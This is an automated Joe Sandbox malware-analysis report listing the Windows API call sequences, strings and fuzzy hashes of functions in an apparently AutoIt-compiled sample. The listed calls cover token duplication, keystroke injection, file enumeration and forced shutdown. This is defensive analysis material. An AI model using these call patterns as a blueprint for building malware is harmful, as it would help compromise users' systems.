                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                                              • API String ID: 3100379633-4164748364
                                                                                                                                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                              APIs
                                                                                                                                              • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                              • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                              • API String ID: 2889586943-2988720461
                                                                                                                                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                              APIs
                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                              • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                              • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                              • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                              • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                              • String ID: $@OH$default$winsta0
                                                                                                                                              • API String ID: 3324942560-3791954436
                                                                                                                                              • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                              • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                              • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                              • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                              • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                              • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                              • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                              • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                              • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                              • API String ID: 999945258-2428617273
                                                                                                                                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                              • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                              • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                              • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                              • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                              • _wcslen.LIBCMT ref: 00403623
                                                                                                                                              • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                              Strings
                                                                                                                                              • Unterminated string, xrefs: 00428348
                                                                                                                                              • Error opening the file, xrefs: 00428231
                                                                                                                                              • _, xrefs: 0040371C
                                                                                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                              • API String ID: 3393021363-188983378
                                                                                                                                              • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                              • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                              APIs
                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                              • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                              • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                              • API String ID: 2192556992-3457252023
                                                                                                                                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                              APIs
                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                              • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                              • String ID: %.3d
                                                                                                                                              • API String ID: 3337348382-986655627
                                                                                                                                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                              • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                              • API String ID: 2938487562-3733053543
                                                                                                                                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
